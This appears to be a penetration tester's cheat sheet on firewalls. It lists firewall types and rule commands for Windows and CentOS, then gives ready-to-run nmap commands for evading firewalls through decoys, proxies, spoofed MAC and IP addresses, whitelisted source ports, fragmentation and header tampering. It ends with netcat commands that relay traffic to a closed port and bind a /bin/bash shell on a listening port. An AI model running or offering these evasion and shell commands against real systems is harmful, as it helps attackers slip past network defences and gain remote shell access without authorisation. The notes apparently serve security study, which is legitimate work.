Firewall Handling

Types

• Packet filtering
• Circuit level gateway
• Stateful inspection
• Proxy
• Next generation firewall
• Cloud firewall and FWaaS

Rules

Windows

netsh advfirewall firewall add rule name="muka" dir=in action=allow protocol=tcp localport=57869

CentOS

firewall-cmd --zone=public --add-port=57869/tcp

Circumvention

• IP/MAC/Port spoofing
• Fragmentation, MTU, data length
• Header modification

nmap

Spoofing

• Decoy -D , mixin real IP address with random adresses. Every port will be requested by any of these addresses.

sudo nmap -Pn -D 192.168.0.23,192.168.0.42,ME -F $TARGET_IP
sudo nmap -Pn -D RND,RND,ME -F $TARGET_IP

• Proxy

sudo nmap -Pn -F --proxies $PROXY_IP $TARGET_IP

• Spoofed MAC

sudo nmap -Pn -F --spoof-mac $MAC_ADDRESS $TARGET_IP

• Spoofed IP

sudo nmap -Pn -F -S $ATTACKER_IP $TARGET_IP

• Port Number, select a port which is whitelisted. Frequently this is 53,80,44

sudo nmap -F --source-port 443 $TARGET_IP

• Fragmentation, eth header + 20 bytes header size + bytes fragments via -f, or 16 bytes via -ff

sudo nmap -Pn -F -f $TARGET_IP

• MTU, works like fragmentation, -f == --mtu 8

sudo nmap -Pn -F --mtu 8 

• DATA Length, eth header + IP header + prepend padding segment size to values of bytes

sudo nmap -Pn -F --data-length 64 $TARGET_IP

Header Fields

• TTL

sudo nmap -Pn -F --ttl 64 $TARGET_IP

• IP OPTIONS, --ip-options recordsas hex String

  • Route, R
  • Timestamp, T
  • Route + Timestamp, U
  • Loose source routing, L $IP $IP $IP
  • Strict source routing, S $IP $IP $IP

• Checksum, craft bad checksum via --badsum to check errors

sudo nmap -Pn -F --badsum $TARGET_IP

After the FW

• Hopping, listen via netcat to catch that port
• Tunneling, relay open after passsing the firewall to connect to the closed port

nc -lvnp 443 --sh-exec "nc $TARGET_IP 25"

• Non standard ports, open bin shell via

nc -lvnp 8888 -e /bin/bash

and connect